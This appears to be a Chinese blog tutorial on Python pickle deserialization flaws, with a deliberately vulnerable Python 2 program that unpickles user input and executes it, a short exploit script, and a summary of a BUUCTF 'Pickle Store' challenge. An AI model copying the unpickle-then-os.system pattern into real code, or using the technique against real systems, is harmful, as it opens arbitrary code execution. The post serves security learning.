python pickle反序列化漏洞_【反序列化】Python反序列化之pickle篇

0x01 前言

前两天在安全客中看了一篇python对象注入的文章,感觉写的很好,就学习一下,在此记录一下。

0x02 Python之pickle

在研究python反序列化漏洞之前,我们需要了解本次研究的主体:pickle模块

这里主要需要知道4个方法:

dump()

dumps()

load()

loads()

pickle.dump(obj, file, [protocol])

dump()会将对象序列化后写入一个文件中,其中,文件需要有write接口,protocol代表的是协议,当protocol=0的时候表示序列化对象用可表示的ascii码写,当protocol=1的时候代表用二进制表示,那么文件就要用wb模式打开,当protocol=2的时候也是用二进制表示,在python2.3之后的版本可以使用,会更高效一些,默认protocol=0。

pickle.dumps(obj)

与dump()不同的是,dumps()只是将序列化对象当作字符串返回

pickle.load(file)

load()会读入file的内容,并将其反序列化为对象,file的内容要求是序列化的内容。

pickle.loads(pick_data)

loads()会将序列化的字符串反序列化为对象

cPickle与pickle的用法差不多,但是cPickle使用C语言写的,别pickle更高效,现在大部分都会使用cPickle来代替pickle了。

0x03 Python对象注入之pickle

什么是对象注入?回想一下之前讲PHP反序列化漏洞的时候的概念,其实差不多,在pickle中,序列化的过程是没有问题的,但是当反序列化的过程中,如果用户的输入被传入unpickling中时,那么就有可能存在对象注入的风险。

举个例子:

import cPickle as pickle

import os, sys

arg = sys.argv[1]

class Test(object):

def load(self, filenmae=None):

with open(filenmae, 'rb') as pick_file:

self.doWork = pickle.load(pick_file)

self.workDone = self.doWork

def final_workout(self, unpickled_data):

self.filename = "code.py"

self.writeinto = open(self.filename, "w")

self.writeinto.write(unpickled_data)

print "Flag = 1"

self.writeinto.close()

os.system("python2 {}".format(str(self.filename)))

if __name__ == '__main__':

test = Test()

test.load(arg)

unpickled_data = test.workDone

test.final_workout(unpickled_data)

这段代码中,首先他有一个接受用户输入的功能,并且反序列化了用户的输入,并放入一个叫做code.py脚本中执行,那么我们就可以构造特定的字符串来执行我们想要的功能。

0x04 漏洞利用编写

exp.py

import cPickle as pickle

filename = "pickle_data2.txt"

code = "code.txt"

class Test(object):

def load(self, code):

self.code = code

self.readin = open(code, "r")

self.readin_data = self.readin.read()

self.done = pickle.dumps(self.readin_data)

def write_into(self, filename, pickle_data):

self.writeinto =open(filename, "w")

self.writeinto.write(pickle_data)

print "Writing pickle data into the file..."

self.writeinto.close()

def read_into(self, filenmae):

self.filename = filename

self.readinto = open(filename, "r")

self.ret_data = self.readinto.read()

print "\n\n"

print "Pickle data: \n\n"

print self.readin_data

if __name__ == '__main__':

test = Test()

test.load(code)

pickle_data = test.done

test.write_into(filename, pickle_data)

test.read_into(filename)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF中的Pickle反序列化漏洞是指在该比赛的题目中存在通过反序列化攻击来执行任意代码的漏洞。具体来说,这个漏洞利用了Python中的pickle模块,pickle模块可以将对象序列化为字符串并保存到文件或通过网络传输。然后可以将这个字符串反序列化为原来的对象。这个过程中,如果不对反序列化的输入进行充分验证和过滤,攻击者可以构造恶意的pickle字符串,从而在反序列化的过程中执行任意代码。 在BUUCTF中,有一个题目叫做"Pickle Store",该题目利用了pickle模块的反序列化功能,并在反序列化的过程中执行了恶意代码。具体的攻击方法是,通过抓包获取到一个包含pickle字符串的session值,然后对这个字符串进行base64解码,并使用pickle模块的loads函数进行反序列化操作。这样就可以触发恶意代码的执行。 为了说明这个例子,作者提供了一个脚本来解析这个pickle字符串,首先使用base64解码得到原始字符串,然后使用pickle模块的loads函数进行反序列化操作,并最终执行恶意代码。这个例子展示了如何利用pickle模块的反序列化功能来执行任意代码。 在pickle模块中,还有一些其他的相关函数和方法可以帮助我们理解和分析pickle字符串的结构和内容。例如,pickletools模块提供了dis函数来反汇编pickle字符串,以及optimize函数来优化和简化pickle字符串的内容。 总结来说,BUUCTF中的Pickle反序列化漏洞是利用了pickle模块的反序列化功能来执行任意代码的漏洞。攻击者通过构造恶意的pickle字符串,可以在反序列化的过程中执行任意代码。为了解析和分析pickle字符串,可以使用pickle模块提供的函数和方法,如loads、pickletools.dis和pickletools.optimize。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值